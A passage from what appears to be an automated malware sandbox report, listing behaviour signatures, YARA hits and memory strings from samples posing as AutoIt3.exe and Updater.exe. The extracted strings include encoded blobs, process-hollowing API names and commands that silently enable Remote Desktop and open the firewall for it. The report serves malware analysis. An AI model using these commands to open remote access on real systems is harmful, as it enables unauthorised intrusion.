                      Source: C:\edgheaa\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                      Source: C:\edgheaa\AutoIt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_00748C58 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,GetFileAttributesW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,35_2_00748C58
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_007159C7 GetUserNameW,35_2_007159C7
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_0070B99F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,35_2_0070B99F
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeCode function: 35_2_006E310D GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,35_2_006E310D
                      Source: C:\Users\user\AppData\Local\friend\Updater.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: find.exe, 00000013.00000002.1714878841.000001BBC6920000.00000004.00000020.00020000.00000000.sdmp, find.exe, 00000013.00000002.1714766876.000001BBC663B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
                      Source: C:\edgheaa\AutoIt3.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                      Source: C:\edgheaa\AutoIt3.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 35.2.Updater.exe.4292be0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.AutoIt3.exe.44e2be0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.AutoIt3.exe.4382be0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 41.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 38.2.AutoIt3.exe.44e2be0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 35.2.Updater.exe.4292be0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 42.2.AutoIt3.exe.4382be0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 41.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002A.00000002.2499336033.000000000437C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000029.00000002.2409431093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000026.00000002.2411065560.00000000044DC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000023.00000002.2239705432.000000000428C000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: AutoIt3.exeBinary or memory string: WIN_81
                      Source: AutoIt3.exeBinary or memory string: WIN_XP
                      Source: AutoIt3.exeBinary or memory string: WIN_XPe
                      Source: AutoIt3.exeBinary or memory string: WIN_VISTA
                      Source: AutoIt3.exe, 0000002A.00000003.2496893980.0000000004C20000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 15, 1USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                      Source: AutoIt3.exeBinary or memory string: WIN_7
                      Source: AutoIt3.exeBinary or memory string: WIN_8

                      Remote Access Functionality

                      barindex
                      Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: Updater.exe, 00000023.00000003.2237151080.00000000049E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: Updater.exe, 00000023.00000002.2239787208.0000000004300000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: Updater.exe, 00000023.00000003.2237303826.00000000047EC000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: AutoIt3.exe, 00000026.00000003.2408266551.0000000004A3C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs ==MSHo3c5uIbjBPp==NR3z4z0r8G5KhXFaTat87LtkeTDj5Gem9839BQi08C5ce3NiQPNo6KNm2ZZmQWJ=RQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3T2cihzNQT1BG2TRnOEGm9Mv64z0vNqJj2Q==NR3y3A0XT1NE1W5aVLDoPz0jT6lfdmxhgOXl7Lxqg0H35n7VbMiBCMNwHHYSQzkUQN0=IMPz1PSsTKYjRQfYLx0KRIRRfnNagfJt66XSgjZuL2ORUtHA2gWv66B3YW9eiyNaPqdc3TZeH02FSuDUJyCTMYVvW1A=RQfYLx0KRIRlenVngUpJT1IoQAveL2OpabfoPQS KqJpdWRtfPFm6KxX1CPrQGOmSbfpPPdGLE==UsuBCwF=OvPrOQ0p8JRbgHVege6pFp K3UDx3HOR8L3zOvPrOQ0p8JRbgHVege6pFpdK3UDx3HOR8L3zRP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSGlJeW K7ZofmZjixRb7rFhfZU=RwDAPA0g8I98eWY=J9uCEJ==J9uDC ==J9uCD ==J9uDDJ==NSPD3f0r8INRdWB Up==L9ia cPzPzCpGDMk2XlaIRmlFcLm3Vyo50BiLCcbNu1f6WsaF8urzbGX505be3ZPNvw7DmQ93DLuzA==G8SlHQmm8GM=F8urzbGvT087FrSryt==Rv38PQOw5KZieC9ajyM=ILP9PPSY8KplenFkgyd 9Wtq3TRx5GOq8L8zPPVdFY3feGY6N9==F6== Rb64zWs8687OXQ6QPI7GE== SKd3p== bzzPzdqABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Keyboard Layout\Preload0000041900000422000004230000043fSystemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice start= aut
                      Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: net start termservice
                      Source: AutoIt3.exe, 00000026.00000003.2408112931.0000000004C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: Unknown exceptionbad array new length: genericiostreamiostream stream errorFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit set805f14f85ee1dae0f3315e33e81c2a42cb36de7f397799e419deb9caf3a96a89322a8d6d5a45058fa30d5968f8d3f9443ad8a7JIODBcl2FnIVRC8mRbI=IobnPxWw8nRadzNvWa1f6qJdizVy2Ht=KHYBCp==RnUq2AZqGHVx4J==IHPx4J==WI8qCcJ2SngmQg==OSb54Q0qFqZU2Q==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLwK2YaWF==RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhLQSi7mFJdGZhgutw66pc3UzBRSLm3gWY7E==RbPyVRVpyvdACJNDUEpHNu1pF7w9RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5YkLw cPzPzCpGDM7RwDAPWOe61Q=RP3LLyiyOoZ3WWp9he1p66RS1C4r3mKmaSHhGW0v7qZkgF3ahfFf66X5VU8y3G2pWMDhKVmi6KA7Umch4yNo7A==GKPYHOONOocwVUBuOI==UtzB3t==Rt3YLt==OPPZ8LKaacGa RKa9SGaVbeaVMCa vGaaLYaWvUaVMSa9wSa9R7a 9U=VSDqPv h6KBY12BehuXa6Kp0VSDqPv h6KA=VRru3v h6KA=Wsy=WIy=WIC=WIG=QLzu2 ==8wL53wtsFA==8wL53AR3FCb=WMbqWvrxVRVp wGC9MHubbfBISz61P0XMvG+MvK+IQvx4Pim6rQlHnmwFl==cp==GcPz1QV6MF== Rbq2zBwGm9aeGA=8RPD2f0pGDMk2GBhORP5JfKX513bX3poiyNjM0Xeft==RwDAPWOe6YV8gGJ2NKTGKUVdO6ccgHh7heM=NMTu3fJ=PRzE3z0v76xVLEB739==OKHKLt==RvzzPzJdO6Z gXNeizc=Ov3o4zdvCJhb1g==NKTMJoSBLzdXS0BJ2WRQhedQ9U==Nbf5Pz0jT09a2XM=Qb3D4zdrRR3B1zdwNR3y2VWsSRfzHz0jT09a2XM=JsyDCsVYHngURQ== bC=aRC=NR3z4z0r8G5KhXFaTatj80pSeUrj4nJmWb3D2L6hS1V8RyF8gVNkTKxqiQQvCSTkIHUyBL5qAFjI2V XT09QOUVehVtl76dSeTZwFiud9SDyBPWe8KIXLG97gOMZCqJ hDukFyud8Lrq2fKqTX49F6UPGVdr8KZkgC5JjPtbImt gEru2WG9avfA2bdsS7VbgC5oizBbS0SFGdQMAFiyBL5qFW4=IHUSs 